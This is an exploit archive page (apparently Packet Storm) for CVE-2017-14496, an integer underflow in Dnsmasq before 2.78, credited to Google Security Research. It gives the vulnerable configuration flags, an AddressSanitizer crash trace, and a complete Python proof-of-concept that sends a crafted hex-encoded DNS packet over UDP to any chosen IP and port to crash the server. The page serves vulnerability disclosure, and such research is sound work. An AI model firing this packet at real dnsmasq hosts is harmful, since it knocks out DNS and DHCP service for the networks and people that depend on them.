Exploit the possiblities

Dnsmasq Integer Underflow

Dnsmasq Integer Underflow
Posted Oct 2, 2017
Authored by Google Security Research

Dnsmasq versions prior to 2.78 suffer from an integer underflow vulnerability.

tags | exploit
advisories | CVE-2017-14496
MD5 | 80164acc90c0204d97c9658b23bb2a92

Dnsmasq Integer Underflow

Change Mirror Download
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.

=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)

0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/

import socket
import sys

def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data

if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

packet = negative_size_param()

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    12 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close